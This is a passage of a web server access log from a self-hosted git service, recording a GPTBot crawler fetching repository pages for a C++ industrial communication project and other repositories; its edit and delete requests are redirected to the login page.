git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 10155] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:16:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 11603] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:16:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 610] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:16:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:16:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 9913] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:16:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:16:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 10162] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:16:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:16:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:16:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 14187] [Gzip 7.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:16:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:16:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 11168] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src" +[17/Feb/2026:16:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 14213] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:16:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 2167] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/codec.cpp" +[17/Feb/2026:16:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11815] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 10517] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12503] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 10233] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:16:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:16:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 10189] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:16:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/src/dummy.cpp" +[17/Feb/2026:16:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10239] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11514] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 424] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 12888] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:16:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=mostissues&state=open" [Client 74.7.227.38] [Length 8491] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" +[17/Feb/2026:16:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11855] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:16:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 21100] [Gzip 7.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs" +[17/Feb/2026:16:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html?display=source" [Client 74.7.227.38] [Length 15707] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" +[17/Feb/2026:16:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11059] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" +[17/Feb/2026:16:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14403] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/index.html" +[17/Feb/2026:16:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14404] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" +[17/Feb/2026:16:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude?display=rendered" [Client 74.7.227.38] [Length 10971] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:16:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude?display=source" [Client 74.7.227.38] [Length 15316] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:16:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8503] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostissues&state=open" +[17/Feb/2026:16:19:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:19:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:16:19:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/index.tsx" +[17/Feb/2026:16:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 11123] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 